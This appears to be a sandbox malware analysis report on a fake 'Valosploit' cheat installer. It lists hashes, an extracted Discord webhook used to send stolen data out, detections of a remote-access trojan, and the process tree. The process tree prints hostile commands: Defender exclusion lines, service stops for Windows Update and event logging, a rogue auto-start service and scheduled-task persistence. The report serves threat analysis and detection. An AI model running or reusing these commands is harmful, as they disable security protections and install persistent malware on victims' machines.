Resubmissions
04-02-2024 01:00
240204-bcq69adgb7 10Analysis
-
max time kernel
122s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
04-02-2024 01:00
Static task
static1
Behavioral task
behavioral1
Sample
ValosploitV3_Installer/Installer.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
ValosploitV3_Installer/Installer.exe
Resource
win10v2004-20231215-en
General
-
Target
ValosploitV3_Installer/Installer.exe
-
Size
12.6MB
-
MD5
e560d8abab1b94fa698c5164b10c4fa5
-
SHA1
7b7e2334f06610ebcb9ac796c471961df6a6c377
-
SHA256
817cac7fcfdc0f48444c45be772997707761e2ca1e43e8d53f8f7e0e7a1e42b0
-
SHA512
cc546819fbf9cb40c8bd7c9f686b2d7e189b624fc94a8075e0a43ebcf83d28ed4fc51227c3450e94de91e2c72ce6ce68d7f5e6f8e9e390406da4bcc32470af16
-
SSDEEP
196608:MgINJY5ucj/+mDZR65PzwNVnQwOsayF0RjPLIp+I3U84IXrTNtNp0GIUOueu/ty:MR+59nYRzw0wlF0RjPLIECU84EJ49h
Malware Config
Extracted
growtopia
https://discord.com/api/webhooks/1199763266872803338/8vedcXoMcyExhe1xhBm5f8ncmafWmOB3pkulE0l8g9Pel0t3ziyr2V51cLTVEjYsE4Rj
Signatures
-
Detect ZGRat V1 34 IoCs
Processes:
resource yara_rule behavioral1/memory/1244-48-0x0000000000730000-0x000000000079C000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-66-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-64-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-70-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-78-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-84-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-94-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-110-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-112-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-118-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-126-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-130-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-128-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-124-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-122-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-120-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-116-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-114-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-108-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-106-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-104-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-102-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-100-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-98-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-96-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-92-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-90-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-88-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-86-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-82-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-80-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-76-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-74-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 behavioral1/memory/1244-72-0x0000000000730000-0x0000000000795000-memory.dmp family_zgrat_v1 -
Creates new service(s) 1 TTPs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 9 IoCs
Processes:
Ilkdt.exeWinHostMgr.exeWinErrorMgr.exeKeyGeneratorI.exeSahyui1337.exeWinErrorMgr.exeKeyGeneratorI.exebauwrdgwodhv.exepid process 1244 Ilkdt.exe 2380 WinHostMgr.exe 2896 WinErrorMgr.exe 2612 KeyGeneratorI.exe 1308 Sahyui1337.exe 1692 WinErrorMgr.exe 2784 KeyGeneratorI.exe 476 1772 bauwrdgwodhv.exe -
Loads dropped DLL 9 IoCs
Processes:
Installer.exeWinErrorMgr.exeKeyGeneratorI.exepid process 2108 Installer.exe 2108 Installer.exe 2108 Installer.exe 2108 Installer.exe 2108 Installer.exe 2108 Installer.exe 2896 WinErrorMgr.exe 2784 KeyGeneratorI.exe 476 -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Drops file in System32 directory 3 IoCs
Processes:
WinHostMgr.exepowershell.exebauwrdgwodhv.exedescription ioc process File opened for modification C:\Windows\system32\MRT.exe WinHostMgr.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe bauwrdgwodhv.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
bauwrdgwodhv.exedescription pid process target process PID 1772 set thread context of 748 1772 bauwrdgwodhv.exe conhost.exe PID 1772 set thread context of 2000 1772 bauwrdgwodhv.exe explorer.exe -
Drops file in Windows directory 2 IoCs
Processes:
wusa.exewusa.exedescription ioc process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2916 sc.exe 2796 sc.exe 1964 sc.exe 2564 sc.exe 1340 sc.exe 2464 sc.exe 980 sc.exe 376 sc.exe 2508 sc.exe 2736 sc.exe 668 sc.exe 928 sc.exe 1280 sc.exe 2184 sc.exe -
Detects Pyinstaller 4 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\KeyGeneratorI.exe pyinstaller C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe pyinstaller C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe pyinstaller C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 6 IoCs
Processes:
powershell.exeexplorer.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30df24ca0557da01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeSahyui1337.exeWinHostMgr.exebauwrdgwodhv.exepowershell.exeexplorer.exepid process 2752 powershell.exe 1308 Sahyui1337.exe 1308 Sahyui1337.exe 2380 WinHostMgr.exe 2380 WinHostMgr.exe 2380 WinHostMgr.exe 2380 WinHostMgr.exe 2380 WinHostMgr.exe 2380 WinHostMgr.exe 2380 WinHostMgr.exe 2380 WinHostMgr.exe 2380 WinHostMgr.exe 2380 WinHostMgr.exe 2380 WinHostMgr.exe 2380 WinHostMgr.exe 2380 WinHostMgr.exe 2380 WinHostMgr.exe 2380 WinHostMgr.exe 1772 bauwrdgwodhv.exe 2232 powershell.exe 1772 bauwrdgwodhv.exe 1772 bauwrdgwodhv.exe 1772 bauwrdgwodhv.exe 1772 bauwrdgwodhv.exe 1772 bauwrdgwodhv.exe 1772 bauwrdgwodhv.exe 1772 bauwrdgwodhv.exe 1772 bauwrdgwodhv.exe 1772 bauwrdgwodhv.exe 1772 bauwrdgwodhv.exe 1772 bauwrdgwodhv.exe 1772 bauwrdgwodhv.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe 2000 explorer.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
Processes:
powershell.exeIlkdt.exeSahyui1337.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exedescription pid process Token: SeDebugPrivilege 2752 powershell.exe Token: SeDebugPrivilege 1244 Ilkdt.exe Token: SeDebugPrivilege 1308 Sahyui1337.exe Token: SeShutdownPrivilege 2044 powercfg.exe Token: SeShutdownPrivilege 2008 powercfg.exe Token: SeShutdownPrivilege 1132 powercfg.exe Token: SeShutdownPrivilege 2176 powercfg.exe Token: SeDebugPrivilege 2232 powershell.exe Token: SeShutdownPrivilege 2304 powercfg.exe Token: SeShutdownPrivilege 1588 powercfg.exe Token: SeShutdownPrivilege 868 powercfg.exe Token: SeShutdownPrivilege 1012 powercfg.exe Token: SeLockMemoryPrivilege 2000 explorer.exe -
Suspicious use of WriteProcessMemory 55 IoCs
Processes:
Installer.exeWinErrorMgr.exeKeyGeneratorI.exeWinErrorMgr.execmd.execmd.exebauwrdgwodhv.exedescription pid process target process PID 2108 wrote to memory of 2752 2108 Installer.exe powershell.exe PID 2108 wrote to memory of 2752 2108 Installer.exe powershell.exe PID 2108 wrote to memory of 2752 2108 Installer.exe powershell.exe PID 2108 wrote to memory of 2752 2108 Installer.exe powershell.exe PID 2108 wrote to memory of 1244 2108 Installer.exe Ilkdt.exe PID 2108 wrote to memory of 1244 2108 Installer.exe Ilkdt.exe PID 2108 wrote to memory of 1244 2108 Installer.exe Ilkdt.exe PID 2108 wrote to memory of 1244 2108 Installer.exe Ilkdt.exe PID 2108 wrote to memory of 2380 2108 Installer.exe WinHostMgr.exe PID 2108 wrote to memory of 2380 2108 Installer.exe WinHostMgr.exe PID 2108 wrote to memory of 2380 2108 Installer.exe WinHostMgr.exe PID 2108 wrote to memory of 2380 2108 Installer.exe WinHostMgr.exe PID 2108 wrote to memory of 2896 2108 Installer.exe WinErrorMgr.exe PID 2108 wrote to memory of 2896 2108 Installer.exe WinErrorMgr.exe PID 2108 wrote to memory of 2896 2108 Installer.exe WinErrorMgr.exe PID 2108 wrote to memory of 2896 2108 Installer.exe WinErrorMgr.exe PID 2108 wrote to memory of 2612 2108 Installer.exe KeyGeneratorI.exe PID 2108 wrote to memory of 2612 2108 Installer.exe KeyGeneratorI.exe PID 2108 wrote to memory of 2612 2108 Installer.exe KeyGeneratorI.exe PID 2108 wrote to memory of 2612 2108 Installer.exe KeyGeneratorI.exe PID 2108 wrote to memory of 1308 2108 Installer.exe Sahyui1337.exe PID 2108 wrote to memory of 1308 2108 Installer.exe Sahyui1337.exe PID 2108 wrote to memory of 1308 2108 Installer.exe Sahyui1337.exe PID 2108 wrote to memory of 1308 2108 Installer.exe Sahyui1337.exe PID 2896 wrote to memory of 1692 2896 WinErrorMgr.exe WinErrorMgr.exe PID 2896 wrote to memory of 1692 2896 WinErrorMgr.exe WinErrorMgr.exe PID 2896 wrote to memory of 1692 2896 WinErrorMgr.exe WinErrorMgr.exe PID 2896 wrote to memory of 1692 2896 WinErrorMgr.exe WinErrorMgr.exe PID 2612 wrote to memory of 2784 2612 KeyGeneratorI.exe KeyGeneratorI.exe PID 2612 wrote to memory of 2784 2612 KeyGeneratorI.exe KeyGeneratorI.exe PID 2612 wrote to memory of 2784 2612 KeyGeneratorI.exe KeyGeneratorI.exe PID 1692 wrote to memory of 2696 1692 WinErrorMgr.exe schtasks.exe PID 1692 wrote to memory of 2696 1692 WinErrorMgr.exe schtasks.exe PID 1692 wrote to memory of 2696 1692 WinErrorMgr.exe schtasks.exe PID 1692 wrote to memory of 2696 1692 WinErrorMgr.exe schtasks.exe PID 2576 wrote to memory of 2976 2576 cmd.exe wusa.exe PID 2576 wrote to memory of 2976 2576 cmd.exe wusa.exe PID 2576 wrote to memory of 2976 2576 cmd.exe wusa.exe PID 444 wrote to memory of 660 444 cmd.exe wusa.exe PID 444 wrote to memory of 660 444 cmd.exe wusa.exe PID 444 wrote to memory of 660 444 cmd.exe wusa.exe PID 1772 wrote to memory of 748 1772 bauwrdgwodhv.exe conhost.exe PID 1772 wrote to memory of 748 1772 bauwrdgwodhv.exe conhost.exe PID 1772 wrote to memory of 748 1772 bauwrdgwodhv.exe conhost.exe PID 1772 wrote to memory of 748 1772 bauwrdgwodhv.exe conhost.exe PID 1772 wrote to memory of 748 1772 bauwrdgwodhv.exe conhost.exe PID 1772 wrote to memory of 748 1772 bauwrdgwodhv.exe conhost.exe PID 1772 wrote to memory of 748 1772 bauwrdgwodhv.exe conhost.exe PID 1772 wrote to memory of 748 1772 bauwrdgwodhv.exe conhost.exe PID 1772 wrote to memory of 748 1772 bauwrdgwodhv.exe conhost.exe PID 1772 wrote to memory of 2000 1772 bauwrdgwodhv.exe explorer.exe PID 1772 wrote to memory of 2000 1772 bauwrdgwodhv.exe explorer.exe PID 1772 wrote to memory of 2000 1772 bauwrdgwodhv.exe explorer.exe PID 1772 wrote to memory of 2000 1772 bauwrdgwodhv.exe explorer.exe PID 1772 wrote to memory of 2000 1772 bauwrdgwodhv.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ValosploitV3_Installer\Installer.exe"C:\Users\Admin\AppData\Local\Temp\ValosploitV3_Installer\Installer.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AbQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcABpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAbgBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAcQB2ACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2380 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵PID:2568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
PID:2976
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:2564
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2916
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:1340
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:2508
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:2796
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GMDTJRUT"3⤵
- Launches sc.exe
PID:1964
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GMDTJRUT" binpath= "C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe" start= "auto"3⤵
- Launches sc.exe
PID:668
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GMDTJRUT"3⤵
- Launches sc.exe
PID:928
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:2464
-
-
-
C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "WindowsErrorHandler" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA15E.tmp" /F4⤵
- Creates scheduled task(s)
PID:2696
-
-
-
-
C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2784
-
-
-
C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:2168
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exeC:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1280
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:748
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:868
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:980
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:376
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2184
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2736
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:444
-
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart1⤵
- Drops file in Windows directory
PID:660
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
631KB
MD50d8215506fa7e58f996f6f3f709cbbc1
SHA14c7408f777df10327c2de84365401539c4a00533
SHA25681ce0dbd35f57e136dfd90f1cdb01e9c2f957db91d45e8e7310004eac183fcdf
SHA51283ba8fbdc78bd3db3f5f8c6662ea3a29820995406241bebf0c2ee21d46bbab94e049a32c8ae2fa942572c4dbf611aaf2ee51f195a3dc32a26b93c4f59a9b844c
-
Filesize
407KB
MD567610c540c548d2be7518345a9632669
SHA12dc9e3f23929f51c78a07179f06cfa828610bf87
SHA256a4634673c98c2369c805101d1c0ec67b8d6c993f93cbf3be94bcd83359891a88
SHA5129f03721281250b4a35fd206e2c569eb1c0a5f54b2cf3ca4d5870aac1e5b2d73c8bc91ca70180fd7769b9b3ff88620f059d2f23a53d79eb0a8e497335c5c31769
-
Filesize
316KB
MD5675d9e9ab252981f2f919cf914d9681d
SHA17485f5c9da283475136df7fa8b62756efbb5dd17
SHA2560f055835332ef8e368185ae461e7c9eacdeb3d600ea550d605b09a20e0856e2d
SHA5129dd936705fd43ebe8be17fcf77173eaaf16046f5880f8fe48fc68ded91ef6202ba65c605980bd2e330d2c7f463f772750a1bd96246fffdc9cb6bf8e1b00a2ccb
-
Filesize
202KB
MD5407358daedb081e4e25225f91e76c116
SHA14e1a759947ee2b72b7e72d1ba3f15d693782b068
SHA256e452aebde1504d0a5086ab4d5d4c11a4648ac23dbcb19ef70c6aba1b72fa1b2b
SHA512bd04e4d58fcf4b6b36009d80c9b0092080222b6a670169e580da2d5ed83726c8f76324efb1af80d8bd37db3d8f1f9ece9f5af36711234ac0010670d96acdcab3
-
Filesize
646KB
MD591ee0956cba06b63139f00a3b8e85c24
SHA16f461c6f95cadaf90401e3753c84d2d4b06e4d5a
SHA2565f89624159c155678a3626c57dd85f44bcad651022b28ecdacc34bb983ef0c0e
SHA5124e9266025021ab4ef9489fe3bc119b0b5d9052ba7385b8952cee88ad48b2b1c4cad6b9821391710c1f4b515531c5170021c8b8458eeba0a308b944dfdbb6de81
-
Filesize
687KB
MD5bf4e3f37b55d4958a9ebcf19e4aaf306
SHA14724b3616673a335e247c8e514a84474494649d1
SHA256f1074a9317d5496d7a50217e427193c6c003e3b5706f9ae727e28eb008f30864
SHA512c39883d882d7a7d21a7ee69ad60e365b348638bf60e0d25a9d470b9232d87438bad431bf03c893d63ce25938ffb6c27c76b729ce4cdbeeffdd85be893b84d6d6
-
Filesize
1024KB
MD53c067870eab717fcd2e658dc04652faa
SHA115593f8bdc44f6c386dad15aecbcb5b9b0f5d3e0
SHA2568b64d1b0268dd708db35740a9accbb8711eb0cbf12aa265d2251611048a56455
SHA512984da87916a3cda224361a23607ac1620a963264087984d1f2d5b19201f10c6f4784b10d10d1e20b58ba81f376c91d8f8bbed8f8db77b46c23e5261939e4182f
-
Filesize
161KB
MD5a78a0a81b8b13b05e40a1ee2b1bb16a2
SHA1106f5bf1af2a86045e54080346e2bc0bce8bcc91
SHA2565ffe8c14dadfbbce1c3f9280d27ed3422d378d2ca9e5f08b1437c250ddc92f70
SHA5127e7921546502b087dc15ea18fedbc9435d61c0700ef8108397a56eb39332b0dd137d1782f0655711848f7bcde41999450190d68a101d869df90e5e3316cc5d3b
-
Filesize
1KB
MD57f673f709ab0e7278e38f0fd8e745cd4
SHA1ac504108a274b7051e3b477bcd51c9d1a4a01c2c
SHA256da5ab3278aaa04fbd51272a617aef9b903ca53c358fac48fc0f558e257e063a4
SHA512e932ccbd9d3ec6ee129f0dab82710904b84e657532c5b623d3c7b3b4ce45732caf8ff5d7b39095cf99ecf97d4e40dd9d755eb2b89c8ede629b287c29e41d1132
-
Filesize
321KB
MD588f3b9ee9165889c9a9fb38b48b39ffa
SHA128216adfd5c6ee77f046e28179efc46fc3160b2c
SHA25665c04f7fc93dce6232975ead1f5200ece9d308f7e95f14c4d1e7366c70369e11
SHA512c12960030919b9ac1ce3585b128c2f0b911d73cea8e723433a928aca78ea3dbc89f0d9a5e38af9b26ea4e10c461d665d27c1bf32725637a972b94828aecc8dc9
-
Filesize
379KB
MD56164c8052566be747bbb705983ae2648
SHA17d6272cb5a663bac13d44576256a117c4348dcbc
SHA25635d180149aea9f68827514e92260da792728cb5f590bb0b1ab13d984844c58bc
SHA512caf44f1fedd5373dc7d7f6715a2cdefae205d4d2957b93c5826028a5dcbcddafbd8a01963a7a44c6e54819e19824de55f6713f7d12e24083195fa9947a61b1c4
-
Filesize
347KB
MD5b5eb6dc63b414f82a110c1b7b4c2f89a
SHA166bb238ebf8fb0e46b7441d1643930ea3d1ab727
SHA256c6883e081bbb6e1b9dbbb26b07797ac8a541b48e9c954497c15b6bd7af30485e
SHA512d3b2346bbdd8094de2cbee20fb8b3d7191793db59e6bff0e6cad3bc225536f426e9d8828533aa42607675cfabdf8f1015ea9b02dcc2e6b0f350d0a85b16c9b44
-
Filesize
719KB
MD56c1681c615172b0d105d4fbe0895d5d2
SHA1bdfed360d6ebd741c031cd3b3ece72e6de8bd68b
SHA2564d71b736fb944505366a74660d76e62e1c0ecebf76adc5e0e47e5e7f6132144e
SHA512fb93521ceba7c2ef9a638079e4061c968d7aefcdbdfe47d90beb0bd19036b4d4378fb171b78fcc823a34bb38c48b4eb2821c3630998f8febb692314fe9117de5
-
Filesize
660KB
MD5d11103129b3851627c6729a6a02f80a9
SHA150dadad7a24f4f3fedf2ceb59126701676ce392d
SHA2562541847276158242d0d227a83073fbef68f7173e129d2e1e7c3d57455e0cdc7b
SHA512f31f8b862751f9ee492349c0f4053761efe2fdc782cb797ced71ccaa4c59712d51dab4f9d6c88f00cbf47b69adf38c3ad86410dcf033971416006961350e5790
-
Filesize
191KB
MD5e004a568b841c74855f1a8a5d43096c7
SHA1b90fd74593ae9b5a48cb165b6d7602507e1aeca4
SHA256d49013d6be0f0e727c0b53bce1d3fed00656c7a2836ceef0a9d4cb816a5878db
SHA512402dd4d4c57fb6f5c7a531b7210a897dfe41d68df99ae4d605944f6e5b2cecaafa3fe27562fe45e7e216a7c9e29e63139d4382310b41f04a35ad56115fbed2af
-
Filesize
256KB
MD5556bd19a5ab7b38b9cc591693e977dd7
SHA1ab731020f512fb87bbfd279f8fee0ba946d05c7b
SHA2563b3ec899eaa108a96dfa44dcaa2e6ca8b04fa7d26400c3e80f4e7b3d913629c3
SHA512865f79d1f3869dcd8fdee9052fc9867dfbf56d510a6a3eb2fc410fdce6528788cad5b6770f50da386d5bde800459326ca18f940cd31236319385316a1b20ca8d
-
Filesize
42KB
MD5d499e979a50c958f1a67f0e2a28af43d
